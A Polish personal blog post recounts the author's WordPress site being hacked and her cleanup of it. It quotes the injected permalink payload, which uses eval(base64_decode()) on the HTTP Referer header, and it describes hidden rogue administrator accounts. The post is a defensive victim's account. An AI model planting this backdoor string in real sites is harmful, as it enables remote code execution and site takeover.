Atak

No i dopadło i mnie. A tak się starałam i pilnowałam aktualizacji skryptu. Jednak jak się okazało ciągle były jakieś dziury. Na szczęście jest szansa, że problem został zażegnany. Przynajmniej na jakiś czas. A było tak.

Najpierw pewien miły czytelnik mojego bloga zwrócił mi uwagę, że mam jakiś problem z linkami bezpośrednimi. Zauważyłam, że istotnie w ustawieniach jest osobliwy format: /post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/ Nieco mnie to zdziwiło, ale nie zaprzątnęłam sobie tym głowy.

Zmieniłam format na poprawny i uznałam, że jest po kłopocie. Nic bardziej mylnego. Za kilka dni zauważyłam, że format jest znów zmieniony. Już nie taki dziwny, ale wciąż nie taki jakiego bym sobie życzyła. Pogrzebałam po panelu administratora i ze zdumieniem stwierdziłam, że mam zarejestrowanych 11 kont ze statusem administratora z czego na liście użytkowników wyświetla się tylko jedno. Na szczęście mam niezbyt szybki komputer i widziałam, że przez ułamek sekundy widoczne są wszystkie.

Rzut oka na bazę danych pozwolił mi stwierdzić, że te dziwne konta mają w nazwie skrypt, który powoduje ukrycie ich, co z kolei uniemożliwia skasowanie z poziomu panelu administratora. No cóż trzeba było metodycznie pousuwać z bazy, choć można było to zrobić z poziomu panelu administracyjnego po wyłączeniu JavaScript w przeglądarce.

Według informacji jakie znalazłam w sieci na temat tego typu ataków powinnam jeszcze przeczesać niektóre katalogi w poszukiwaniu podejrzanych plików. Szczegółowy opis tego sposobu ataku na WordPress’a oraz procedury usuwania szkodników i zabezpieczania się na przyszłość można znaleźć na blogu Poradnik Webmastera oraz na forum WordPress’a

2 komentarze do wpisu „Atak”

Leave a Reply

%d bloggers like this: